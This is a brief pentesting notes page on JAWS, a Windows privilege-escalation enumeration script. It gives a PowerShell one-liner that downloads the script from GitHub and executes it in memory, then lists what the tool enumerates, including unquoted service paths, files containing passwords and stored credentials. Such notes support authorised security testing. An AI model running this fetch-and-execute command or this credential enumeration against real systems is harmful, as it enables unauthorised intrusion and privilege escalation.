Pentesting

JAWS

Start

iex(New-Object net.WebClient).downloadstring("https://raw.githubusercontent.com/411Hall/JAWS
/master/jaws-enum.ps1")

Info recopilation

It does not only check for privilege escalation missconfiguration, but it also gathers information about the current situation.

  • Users & groups

  • Network (interfaces, arp, ports, firewall (lot of output), hosts)

  • Processes

  • Scheduled Tasks (lot of output)

  • Services (lot of output)

  • Installed Software, Program folders

  • Patches

  • Drives

  • Last modified files

Checks

  • Files and folders with Full Control

  • Unquoted Service Paths

  • Potentially interesting files

  • System files with password

  • Stored credentials